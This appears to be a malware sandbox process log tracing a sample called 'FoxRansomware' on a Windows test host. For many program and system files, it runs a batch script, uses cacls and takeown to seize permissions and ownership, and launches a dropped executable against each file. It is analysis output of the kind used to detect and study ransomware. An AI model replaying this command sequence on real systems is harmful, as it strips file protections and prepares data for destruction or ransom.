C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.hsp""2⤵
- Loads dropped DLL
PID:1548 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.hsp" /E /G Admin:F /C3⤵PID:1940
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.hsp"3⤵PID:2440
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "usa03.hsp" -nobanner3⤵
- Loads dropped DLL
PID:4128 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "usa03.hsp" -nobanner4⤵
- Executes dropped EXE
PID:2632
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4036
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CYRILLIC.TXT""2⤵
- Loads dropped DLL
PID:4800 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CYRILLIC.TXT" /E /G Admin:F /C3⤵PID:2904
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CYRILLIC.TXT"3⤵
- Modifies file permissions
PID:1332
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "CYRILLIC.TXT" -nobanner3⤵
- Loads dropped DLL
PID:4132 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "CYRILLIC.TXT" -nobanner4⤵
- Executes dropped EXE
PID:4116
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4796
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1252.TXT""2⤵
- Loads dropped DLL
PID:1444 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1252.TXT" /E /G Admin:F /C3⤵PID:4672
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1252.TXT"3⤵PID:4680
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "CP1252.TXT" -nobanner3⤵
- Loads dropped DLL
PID:4760 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "CP1252.TXT" -nobanner4⤵
- Executes dropped EXE
PID:568
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4288
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_distributed.gif""2⤵
- Loads dropped DLL
PID:4172 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_distributed.gif" /E /G Admin:F /C3⤵PID:4236
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_distributed.gif"3⤵PID:1612
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "forms_distributed.gif" -nobanner3⤵
- Loads dropped DLL
PID:4316 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "forms_distributed.gif" -nobanner4⤵
- Executes dropped EXE
PID:4232
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4244
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_sent.gif""2⤵
- Loads dropped DLL
PID:3708 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_sent.gif" /E /G Admin:F /C3⤵PID:4380
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_sent.gif"3⤵PID:4256
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "reviews_sent.gif" -nobanner3⤵
- Loads dropped DLL
PID:1772 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "reviews_sent.gif" -nobanner4⤵
- Executes dropped EXE
PID:4044
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4340
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\stop_collection_data.gif""2⤵
- Loads dropped DLL
PID:4428 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\stop_collection_data.gif" /E /G Admin:F /C3⤵PID:1800
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\stop_collection_data.gif"3⤵PID:1636
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "stop_collection_data.gif" -nobanner3⤵
- Loads dropped DLL
PID:1812 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "stop_collection_data.gif" -nobanner4⤵
- Executes dropped EXE
PID:4152
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:2696
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\ReadMe.htm""2⤵
- Loads dropped DLL
PID:1592 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\ReadMe.htm" /E /G Admin:F /C3⤵PID:2096
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\ReadMe.htm"3⤵PID:4296
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "ReadMe.htm" -nobanner3⤵
- Loads dropped DLL
PID:4996 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "ReadMe.htm" -nobanner4⤵
- Executes dropped EXE
PID:4912
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4856
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf""2⤵
- Loads dropped DLL
PID:4968 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf" /E /G Admin:F /C3⤵PID:5040
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf"3⤵
- Modifies file permissions
PID:2212
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "MinionPro-It.otf" -nobanner3⤵
- Loads dropped DLL
PID:2880 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "MinionPro-It.otf" -nobanner4⤵
- Executes dropped EXE
PID:3712
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4700
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZX______.PFB""2⤵
- Loads dropped DLL
PID:4488 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZX______.PFB" /E /G Admin:F /C3⤵PID:3828
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZX______.PFB"3⤵PID:3836
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "ZX______.PFB" -nobanner3⤵
- Loads dropped DLL
PID:3248 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "ZX______.PFB" -nobanner4⤵
- Executes dropped EXE
PID:3744
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:2032
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt04.hsp""2⤵
- Loads dropped DLL
PID:4420 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt04.hsp" /E /G Admin:F /C3⤵PID:4504
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt04.hsp"3⤵
- Modifies file permissions
PID:4520
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "brt04.hsp" -nobanner3⤵
- Loads dropped DLL
PID:3884 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "brt04.hsp" -nobanner4⤵
- Executes dropped EXE
PID:3988
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4812
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\engphon.env""2⤵
- Loads dropped DLL
PID:3256 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\engphon.env" /E /G Admin:F /C3⤵PID:4564
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\engphon.env"3⤵PID:3664
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "engphon.env" -nobanner3⤵
- Loads dropped DLL
PID:3700 -
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "engphon.env" -nobanner4⤵
- Executes dropped EXE
PID:2820
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:3688
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT""2⤵PID:3440
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT" /E /G Admin:F /C3⤵PID:3288
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT"3⤵
- Modifies file permissions
PID:3872
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "CORPCHAR.TXT" -nobanner3⤵PID:3264
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "CORPCHAR.TXT" -nobanner4⤵
- Executes dropped EXE
PID:4368
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1320
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT""2⤵PID:3792
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT" /E /G Admin:F /C3⤵PID:3160
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT"3⤵
- Modifies file permissions
PID:3252
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "CP1250.TXT" -nobanner3⤵PID:3244
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "CP1250.TXT" -nobanner4⤵PID:3276
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3280
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml""2⤵PID:3188
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml" /E /G Admin:F /C3⤵PID:3360
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:3516
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "resource.xml" -nobanner3⤵PID:3544
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "resource.xml" -nobanner4⤵PID:3536
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2452
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\fr-FR\resource.xml""2⤵PID:4552
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\fr-FR\resource.xml" /E /G Admin:F /C3⤵PID:948
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\fr-FR\resource.xml"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1676
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "resource.xml" -nobanner3⤵PID:2708
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "resource.xml" -nobanner4⤵PID:3604
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3228
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml""2⤵PID:3428
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml" /E /G Admin:F /C3⤵PID:3372
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:3484
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "behavior.xml" -nobanner3⤵PID:2444
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "behavior.xml" -nobanner4⤵PID:3668
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3832
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\de-DE\resource.xml""2⤵PID:3996
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\de-DE\resource.xml" /E /G Admin:F /C3⤵PID:888
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\de-DE\resource.xml"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2892
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "resource.xml" -nobanner3⤵PID:880
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "resource.xml" -nobanner4⤵PID:2448
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2672
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Users\All Users\Microsoft\Network\Downloader\qmgr1.dat""2⤵PID:3852
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Network\Downloader\qmgr1.dat" /E /G Admin:F /C3⤵PID:2088
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Network\Downloader\qmgr1.dat"3⤵PID:3356
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "qmgr1.dat" -nobanner3⤵PID:2112
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "qmgr1.dat" -nobanner4⤵PID:4744
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:760
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Program Files\Microsoft Games\Purble Place\PurblePlaceMCE.png""2⤵PID:3004
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Microsoft Games\Purble Place\PurblePlaceMCE.png" /E /G Admin:F /C3⤵PID:956
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Microsoft Games\Purble Place\PurblePlaceMCE.png"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:3412
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "PurblePlaceMCE.png" -nobanner3⤵PID:3336
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "PurblePlaceMCE.png" -nobanner4⤵PID:3192
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2956
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Program Files\Microsoft Games\Solitaire\SolitaireMCE.png""2⤵PID:4636
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Microsoft Games\Solitaire\SolitaireMCE.png" /E /G Admin:F /C3⤵PID:4844
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Microsoft Games\Solitaire\SolitaireMCE.png"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4940
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "SolitaireMCE.png" -nobanner3⤵PID:1236
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "SolitaireMCE.png" -nobanner4⤵PID:1512
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2676
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\Program Files\Microsoft Games\SpiderSolitaire\SpiderSolitaireMCE.png""2⤵PID:3612
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Microsoft Games\SpiderSolitaire\SpiderSolitaireMCE.png" /E /G Admin:F /C3⤵PID:1240
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Microsoft Games\SpiderSolitaire\SpiderSolitaireMCE.png"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1788
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "SpiderSolitaireMCE.png" -nobanner3⤵PID:588
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "SpiderSolitaireMCE.png" -nobanner4⤵PID:2168
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2680
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\ProgramData\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata""2⤵PID:944
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata" /E /G Admin:F /C3⤵PID:1736
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata"3⤵
- Modifies file permissions
PID:2384
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "directories.acrodata" -nobanner3⤵PID:1996
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "directories.acrodata" -nobanner4⤵PID:4016
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1440
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\behavior.xml""2⤵PID:1560
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\behavior.xml" /E /G Admin:F /C3⤵PID:2412
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\behavior.xml"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2764
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "behavior.xml" -nobanner3⤵PID:3084
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "behavior.xml" -nobanner4⤵PID:4988
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4660
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\fr-FR\resource.xml""2⤵PID:3140
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\fr-FR\resource.xml" /E /G Admin:F /C3⤵PID:1768
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\fr-FR\resource.xml"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3904
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Gi44eNKg.exe -accepteula "resource.xml" -nobanner3⤵PID:4684
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula "resource.xml" -nobanner4⤵PID:4104
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exeGi44eNKg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1696
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\U4ln8d8C.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\ja-JP\resource.xml""2⤵PID:4600
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\ja-JP\resource.xml" /E /G Admin:F /C3⤵PID:1488
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\ja-JP\resource.xml"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:852
-
-
